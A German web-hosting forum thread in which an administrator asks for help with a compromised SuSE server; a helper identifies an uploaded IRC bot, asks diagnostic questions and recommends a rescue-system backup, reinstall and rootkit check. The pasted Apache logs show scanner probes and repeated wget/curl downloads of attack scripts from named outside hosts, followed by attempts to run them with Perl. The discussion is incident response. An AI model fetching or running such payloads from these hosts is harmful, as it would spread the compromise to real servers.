DOs Attacke

[docHouse]

Hallo zusammen,
könnte mal Eure Hilfe gebrauchen, schlage mich derzeit mit einer DOS Attacke [ nehme ich zumindest an] rum. Ich habe allerdings nichts wirkliches in den LogFiles gefunden, bis dato zumindest nicht.

Fakt ist, das i.d.R Nachts irgendwann ein Perl Prozess gestartet wird, der natürlich die kompletten Serverresourcen zieht.

Und, dann hatte ich das merkwürdige Problem das sich der Apache nicht mehr starten lies - Fehlermeldung : Port already in use

Gefunden habe ich dann heute das angehängte File, stehe allerdings ziehmlich auf dem Schlauch, da ich damit nicht wirklich etwas anzufangen weis.

Ob und wie das zusammenhängt, keine Ahnung ...

THX
Grüße
DocHouse

 

[charli]

Hallo,

das ist ein IRC-Bot, die Texte in dem Script sind portugiesisch, AltaVista - Babel Fish Translation kann sie notdürftig in' Englische übersetzen.

Dein Server wurde also "gehackt", Du solltest ihn herunterfahren bzw (sofern Dein Provider das hat) im Rescue-System starten, damit er keinen weiteren Schaden anrichten kann.

Es ist schwer zu sagen, ob der Einbrecher nur dieses eine Script eingemogelt hat oder mehr auf dem Server unternommen, schlimmstenfalls hat er jetzt Root-Zugang.

Standardempfehlung: im Rescue alles sichern und neu installieren. Vorher (oder nachher wenn Du die Komplettsicherung auf dem PC hast) in den Logfiles nachsehen wie er reingekommen ist.

In welchem Verzeichnis wurde die Datei gefunden?
Welche Rechte, Owner, Group hat die Datei?
Welche Rechte, Owner, Group hat das Verzeichnis in dem sie liegt?
Welches Betriebssystem? bei Linux: welcher Kernel?
Wann zuletzt alle Standarddienste geupdated?
Einstellungen für register_globals und allow_url_fopen in php.ini (falls mehrere vorhanden alle angucken)?
Welche PHP-Standardpakete (Boards, *nuke, *gallery usw) sind installiert?

 

[docHouse]

Hi ...

ich mache es mal schnell ;-)

In welchem Verzeichnis wurde die Datei gefunden?
/tmp
Welche Rechte, Owner, Group hat die Datei?
-rw-r--r-- | wwwrun | www
Welche Rechte, Owner, Group hat das Verzeichnis in dem sie liegt?
drwxrwxrwt | root | root
Welches Betriebssystem? bei Linux: welcher Kernel?
Suse 9.3 | Apache 2.0.53 APi 20020903 | PHP 4.3.10
Wann zuletzt alle Standarddienste geupdated?
< 2 Wochen
Einstellungen für register_globals und allow_url_fopen in php.ini (falls mehrere vorhanden alle angucken)?
off | on
Welche PHP-Standardpakete (Boards, *nuke, *gallery usw) sind installiert?
Diverse Joomla / Mambo installationen

Ach ja, dann habe ich heute in Plesk den 6667 gesperrt

Und, dann habe ich gerade noch eine Datei ips.txt gefunden mit folgendem Inhalt:

addr:85.xxx.35.238
addr:
addr:127.0.0.1
addr:

Ob er nur oder mehr augeschleust hat, ja, schwer zu sagen , allerdings habe ich mir die Dateiveränderungen der letzten 24 Stunden angesehen und dabei nicht wirklich etwas auffälliges bemerkt ...

thx

 

[charli]

Hallo,

In welchem Verzeichnis wurde die Datei gefunden?
/tmp
Welche Rechte, Owner, Group hat die Datei?
-rw-r--r-- | wwwrun | www

ziemlich sicher über ein unsicheres PHP-Script eingeschleust.

Wann wurde der Kernel zuletzt aktualisiert? Welcher läuft (uname -a)?

Wann zuletzt alle Standarddienste geupdated?
< 2 Wochen

ok.

allow_url_fopen: on

Damit anfällig für eine der häufigsten Lücken in den PHP-Paketen.

Diverse Joomla / Mambo installationen

vermutlich darüber eingedrungen. Wann wurden die zuletzt aktualisiert?

Und, dann habe ich gerade noch eine Datei ips.txt

Gehört zu dem Script (Konfigurationsdatei).

Es kann sein, daß außer den Bot nix passiert ist, es kann aber auch sein, daß der Hacker Rootzugang erlangt und ein Rootkit installiert hat. Laß mal chkrootkit (chkrootkit -- locally checks for signs of a rootkit) laufen. Zuverlässig ist chkrootkit leider nicht.

 

[docHouse]

So, jetzt habe ich dann doch noch so einiges gefunden ....

[Sun Sep 10 03:26:17 2006] [error] [client 212.241.202.240] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind
[Sun Sep 10 03:45:56 2006] [error] [client 212.241.202.240] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind[Sun Sep 10 12:02:28 2006] [error] [client 85.214.54.110] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind

--16:16:07-- http://www.myspace.si/inc/htaccess
=> `htaccess'
Resolving MySpace .si | myspace layouts, myspace editor, myspace backgrounds, myspace codes... 195.246.8.48
Connecting to www.myspace.si|195.246.8.48|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30,070 (29K) [text/plain]

0K ..--16:16:07-- http://www.myspace.si/inc/htaccess
=> `htaccess.1'
Resolving MySpace .si | myspace layouts, myspace editor, myspace backgrounds, myspace codes... 195.246.8.48
Connecting to www.myspace.si|195.246.8.48|:80... ........ .connected.
HTTP request sent, awaiting response... ......... ......200 OK
Length: 30,070 (29K) [text/plain]

0K ..... 100% 240.45 KB/s

16:16:07 (240.45 KB/s) - `htaccess' saved [30070/30070]

........ .......... ......... 100% 229.44 KB/s

utime(htaccess.1): No such file or directory
16:16:07 (229.44 KB/s) - `htaccess.1' saved [30070/30070]

chmod: cannot access `htaccess': No such file or directory
sh: ./htaccess: No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 30070 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 30070 100 30070 0 0 163k 0 --:--:-- --:--:-- --:--:-- 333k
[Sun Sep 10 16:39:14 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/README
[Sun Sep 10 16:39:15 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde
[Sun Sep 10 16:39:15 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde2
[Sun Sep 10 16:39:15 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde3
[Sun Sep 10 16:39:16 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde-3.0.5
[Sun Sep 10 16:39:16 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde-3.0.6
[Sun Sep 10 16:39:16 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde-3.0.7
[Sun Sep 10 16:39:17 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde-3.0.8
[Sun Sep 10 16:39:17 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/horde-3.0.9
[Sun Sep 10 16:39:18 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/mail
[Sun Sep 10 16:39:18 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/email
[Sun Sep 10 16:39:18 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/webmail
[Sun Sep 10 16:39:19 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/newmail
[Sun Sep 10 16:39:19 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/mails
[Sun Sep 10 16:39:19 2006] [error] [client 216.73.112.234] File does not exist: /var/www/vhosts/default/htdocs/mailz
[Sun Sep 10 17:29:39 2006] [error] [client 216.145.17.190] File does not exist: /var/www/vhosts/default/htdocs/robots.txt, referer: Whois lookup and Domain name search
[Sun Sep 10 17:52:07 2006] [error] [client 60.191.251.9] File does not exist: /var/www/vhosts/default/htdocs/mambo
--19:10:08-- http://www.myspace.si/inc/htaccess
=> `htaccess'
Resolving MySpace .si | myspace layouts, myspace editor, myspace backgrounds, myspace codes... 195.246.8.48
Connecting to www.myspace.si|195.246.8.48|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30,070 (29K) [text/plain]

0K .......... .......... ......... 100% 205.77 KB/s

19:10:08 (205.77 KB/s) - `htaccess' saved [30070/30070]

[Sun Sep 10 19:41:28 2006] [error] [client 208.17.184.48] File does not exist: /var/www/vhosts/default/htdocs/robots.txt, referer: -
[Sun Sep 10 19:50:32 2006] [error] [client 72.30.133.120] File does not exist: /var/www/vhosts/default/htdocs/robots.txt
[Sun Sep 10 19:50:42 2006] [error] [client 72.30.103.95] script '/var/www/vhosts/default/htdocs/index.php' not found or unable to stat
[Sun Sep 10 20:54:05 2006] [error] [client 193.227.17.30] File does not exist: /var/www/vhosts/default/htdocs/mambo
--20:55:47-- http://teseu.lcc.ufmg.br/joomla/components/com_extcalendar/httpd.txt
=> `httpd.txt'
Resolving teseu.lcc.ufmg.br... 150.164.66.72
Connecting to teseu.lcc.ufmg.br|150.164.66.72|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,759 (29K) [text/plain]

0K .......... .......... ......... 100% 31.05 KB/s

20:55:48 (31.05 KB/s) - `httpd.txt' saved [29759/29759]

--20:56:00-- http://teseu.lcc.ufmg.br/joomla/components/com_extcalendar/httpd.txt
=> `httpd.txt'
Resolving teseu.lcc.ufmg.br... 150.164.66.72
Connecting to teseu.lcc.ufmg.br|150.164.66.72|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,759 (29K) [text/plain]

0K .......... .......... ......... 100% 30.93 KB/s

20:56:07 (30.93 KB/s) - `httpd.txt' saved [29759/29759]

--21:01:47-- http://teseu.lcc.ufmg.br/joomla/components/com_extcalendar/httpd.txt
=> `httpd.txt'
Resolving teseu.lcc.ufmg.br... 150.164.66.72
Connecting to teseu.lcc.ufmg.br|150.164.66.72|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,759 (29K) [text/plain]

0K .......... .......... ......... 100% 31.01 KB/s

21:01:48 (31.01 KB/s) - `httpd.txt' saved [29759/29759]

[Sun Sep 10 21:03:12 2006] [error] [client 200.90.110.74] File does not exist: /var/www/vhosts/default/htdocs/mambo
--21:15:21-- http://www.myspace.si/inc/htaccess
=> `htaccess'
Resolving MySpace .si | myspace layouts, myspace editor, myspace backgrounds, myspace codes... 195.246.8.48
Connecting to www.myspace.si|195.246.8.48|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30,070 (29K) [text/plain]

0K .......... .......... ......... 100% 242.08 KB/s

21:15:21 (242.08 KB/s) - `htaccess' saved [30070/30070]

[Sun Sep 10 22:16:37 2006] [error] [client 222.45.36.8] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Sun Sep 10 22:28:03 2006] [error] [client 122.254.242.91] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 00:13:57 2006] [error] [client 202.93.8.147] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 00:24:14 2006] [error] [client 61.100.51.245] File does not exist: /var/www/vhosts/default/htdocs/mambo
--00:24:24-- http://69.24.164.241/mar5.txt
=> `mar5.txt'
Connecting to 69.24.164.241:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,670 (29K) [text/plain]

0K .......... .......... ........ 100% 33.83 KB/s

00:24:25 (33.83 KB/s) - `mar5.txt' saved [29670/29670]

[Mon Sep 11 00:25:56 2006] [error] [client 202.93.8.147] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 01:01:45 2006] [error] [client 87.118.96.245] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind
[Mon Sep 11 01:08:26 2006] [error] [client 68.142.212.201] File does not exist: /var/www/vhosts/default/htdocs/robots.txt
[Mon Sep 11 02:19:13 2006] [error] [client 213.247.32.6] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 02:24:08 2006] [error] [client 210.87.251.106] File does not exist: /var/www/vhosts/default/htdocs/mambo
--03:26:25-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 308.44 KB/s

03:26:25 (308.44 KB/s) - `v6.txt' saved [16629/16629]

--03:26:41-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 233.59 KB/s

03:26:41 (233.59 KB/s) - `v6.txt' saved [16629/16629]

--03:26:46-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 322.11 KB/s

03:26:47 (322.11 KB/s) - `v6.txt' saved [16629/16629]

--03:26:50-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 236.78 KB/s

03:26:51 (236.78 KB/s) - `v6.txt' saved [16629/16629]

--03:26:54-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 197.88 KB/s

03:26:54 (197.88 KB/s) - `v6.txt' saved [16629/16629]

--03:27:15-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 235.62 KB/s

03:27:16 (235.62 KB/s) - `v6.txt' saved [16629/16629]

--03:27:53-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 234.98 KB/s

03:27:53 (234.98 KB/s) - `v6.txt' saved [16629/16629]

--03:29:26-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 228.79 KB/s

03:29:26 (228.79 KB/s) - `v6.txt' saved [16629/16629]

--03:29:34-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 234.00 KB/s

03:29:34 (234.00 KB/s) - `v6.txt' saved [16629/16629]

--03:30:13-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 237.19 KB/s

03:30:13 (237.19 KB/s) - `v6.txt' saved [16629/16629]

--03:31:17-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 230.12 KB/s

03:31:18 (230.12 KB/s) - `v6.txt' saved [16629/16629]

--03:31:58-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 235.03 KB/s

03:31:58 (235.03 KB/s) - `v6.txt' saved [16629/16629]

--03:32:40-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 225.46 KB/s

03:32:40 (225.46 KB/s) - `v6.txt' saved [16629/16629]

--03:32:49-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 234.12 KB/s

03:32:50 (234.12 KB/s) - `v6.txt' saved [16629/16629]

--03:32:58-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 234.87 KB/s

03:32:58 (234.87 KB/s) - `v6.txt' saved [16629/16629]

--03:33:14-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 234.08 KB/s

03:33:14 (234.08 KB/s) - `v6.txt' saved [16629/16629]

--03:33:46-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 237.28 KB/s

03:33:47 (237.28 KB/s) - `v6.txt' saved [16629/16629]

--03:34:12-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 237.06 KB/s

03:34:12 (237.06 KB/s) - `v6.txt' saved [16629/16629]

--03:34:35-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 235.47 KB/s

03:34:35 (235.47 KB/s) - `v6.txt' saved [16629/16629]

--03:36:35-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 236.17 KB/s

03:36:35 (236.17 KB/s) - `v6.txt' saved [16629/16629]

--03:37:42-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 234.55 KB/s

03:37:43 (234.55 KB/s) - `v6.txt' saved [16629/16629]

--03:39:34-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 237.96 KB/s

03:39:34 (237.96 KB/s) - `v6.txt' saved [16629/16629]

[Mon Sep 11 03:43:36 2006] [error] [client 82.117.211.7] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 03:49:15 2006] [error] [client 193.227.17.30] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 04:18:15 2006] [error] [client 213.247.32.6] File does not exist: /var/www/vhosts/default/htdocs/mambo
--04:24:45-- http://www.myspace.si/inc/htaccess
=> `htaccess'
Resolving MySpace .si | myspace layouts, myspace editor, myspace backgrounds, myspace codes... 195.246.8.48
Connecting to www.myspace.si|195.246.8.48|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30,070 (29K) [text/plain]

0K .......... .......... ......... 100% 358.90 KB/s

04:24:45 (358.90 KB/s) - `htaccess' saved [30070/30070]

[Mon Sep 11 04:32:29 2006] [error] [client 70.86.137.162] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 04:36:50 2006] [error] [client 68.142.212.234] File does not exist: /var/www/vhosts/default/htdocs/robots.txt
[Mon Sep 11 05:13:16 2006] [error] [client 139.18.13.212] File does not exist: /var/www/vhosts/httpdocs/robots.txt
[Mon Sep 11 06:29:24 2006] [error] [client 222.148.43.178] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 06:37:29 2006] [error] [client 72.30.252.152] File does not exist: /var/www/vhosts/default/htdocs/robots.txt
[Mon Sep 11 07:10:15 2006] [error] [client 193.227.17.30] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 07:59:39 2006] [error] [client 212.34.175.87] File does not exist: /var/www/vhosts/default/htdocs/robots.txt
[Mon Sep 11 08:14:46 2006] [error] [client 213.203.237.130] File does not exist: /var/www/vhosts/default/htdocs/robots.txt
[Mon Sep 11 08:14:46 2006] [error] [client 213.203.237.130] File does not exist: /var/www/vhosts/default/htdocs/Templates
[Mon Sep 11 08:14:46 2006] [error] [client 213.203.237.130] File does not exist: /var/www/vhosts/default/htdocs/Templates
[Mon Sep 11 08:14:46 2006] [error] [client 213.203.237.130] File does not exist: /var/www/vhosts/default/htdocs/Templates
[Mon Sep 11 08:14:46 2006] [error] [client 213.203.237.130] File does not exist: /var/www/vhosts/default/htdocs/Templates
[Mon Sep 11 08:14:46 2006] [error] [client 213.203.237.130] File does not exist: /var/www/vhosts/default/htdocs/Templates
[Mon Sep 11 08:14:46 2006] [error] [client 213.203.237.130] File does not exist: /var/www/vhosts/default/htdocs/impressum.html
[Mon Sep 11 08:26:41 2006] [error] [client 203.187.249.27] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 08:28:59 2006] [error] [client 221.148.195.190] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 08:38:35 2006] [error] [client 87.123.90.1] File does not exist: /var/www/vhosts/default/htdocs/favicon.ico
[Mon Sep 11 08:39:47 2006] [notice] Graceful restart requested, doing restart
[Mon Sep 11 08:39:48 2006] [warn] RSA server certificate CommonName (CN) `h746895.serverkompetenz.net' does NOT match server name!?
[Mon Sep 11 08:39:48 2006] [warn] RSA server certificate CommonName (CN) `plesk' does NOT match server name!?
[Mon Sep 11 08:39:49 2006] [notice] Apache/2.0.53 (Linux/SUSE) configured -- resuming normal operations
[Mon Sep 11 09:15:59 2006] [error] [client 68.142.212.233] File does not exist: /var/www/vhosts/default/htdocs/robots.txt
[Mon Sep 11 09:27:45 2006] [error] [client 70.86.137.162] File does not exist: /var/www/vhosts/default/htdocs/mambo
[Mon Sep 11 09:33:48 2006] [error] [client 70.86.137.162] File does not exist: /var/www/vhosts/default/htdocs/mambonew
[Mon Sep 11 10:22:22 2006] [error] [client 61.110.223.240] File does not exist: /var/www/vhosts/default/htdocs/mambo
--10:26:46-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 233.95 KB/s

10:26:47 (233.95 KB/s) - `v6.txt' saved [16629/16629]

--10:26:56-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 233.06 KB/s

10:26:56 (233.06 KB/s) - `v6.txt' saved [16629/16629]

--10:27:13-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 213.35 KB/s

10:27:14 (213.35 KB/s) - `v6.txt' saved [16629/16629]

--10:27:21-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 234.07 KB/s

10:27:21 (234.07 KB/s) - `v6.txt' saved [16629/16629]

--10:28:52-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 235.15 KB/s

10:28:52 (235.15 KB/s) - `v6.txt' saved [16629/16629]

--10:29:15-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... --10:29:15-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K ..200 OK
Length: 16,629 (16K) [text/plain]
v6.txt has sprung into existence.
Retrying.

........ ...... 100% 210.25 KB/s

10:29:15 (210.25 KB/s) - `v6.txt' saved [16629/16629]

--10:29:16-- http://perqafohu.com/~armendibx/oki/v6.txt
(try: 2) => `v6.txt.1'
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 234.60 KB/s

10:29:16 (234.60 KB/s) - `v6.txt.1' saved [16629/16629]

Can't open perl script "v6.txt": No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
15 16629 15 2668 0 0 35996 0 --:--:-- --:--:-- --:--:-- 35996
100 16629 100 16629 0 0 113k 0 --:--:-- --:--:-- --:--:-- 200k
--10:29:22-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 234.90 KB/s

10:29:22 (234.90 KB/s) - `v6.txt' saved [16629/16629]

--10:29:28-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 232.92 KB/s

10:29:28 (232.92 KB/s) - `v6.txt' saved [16629/16629]

--10:29:37-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... --10:29:37-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... connected.
HTTP request sent, awaiting response... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... 200 OK
Length: 16,629 (16K) [text/plain]

0K ..connected.
HTTP request sent, awaiting response... ......200 OK
Length: 16,629 (16K) [text/plain]
v6.txt has sprung into existence.
Retrying.

.. ...... 100% 234.78 KB/s

10:29:37 (234.78 KB/s) - `v6.txt' saved [16629/16629]

--10:29:38-- http://perqafohu.com/~armendibx/oki/v6.txt
(try: 2) => `v6.txt.1'
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 232.51 KB/s

10:29:38 (232.51 KB/s) - `v6.txt.1' saved [16629/16629]

Can't open perl script "v6.txt": No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
7 16629 7 1220 0 0 16026 0 0:00:01 --:--:-- 0:00:01 16026
100 16629 100 16629 0 0 112k 0 --:--:-- --:--:-- --:--:-- 221k
--10:29:58-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 232.01 KB/s

10:29:58 (232.01 KB/s) - `v6.txt' saved [16629/16629]

--10:30:03-- http://perqafohu.com/~armendibx/oki/v6.txt
=> `v6.txt'
Resolving perqafohu.com... 212.241.204.151
Connecting to perqafohu.com|212.241.204.151|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,629 (16K) [text/plain]

0K .......... ...... 100% 233.82 KB/s

10:30:04 (233.82 KB/s) - `v6.txt' saved [16629/16629]

Und das zieht sich so weiter .....

 

[charli]

Hallo,

der Server von dem er die v6.txt holen will ist nicht erreichbar, vermutlich wurde das Angriffsscript deshalb immer wieder gestartet.

 

[docHouse]

Hallo,

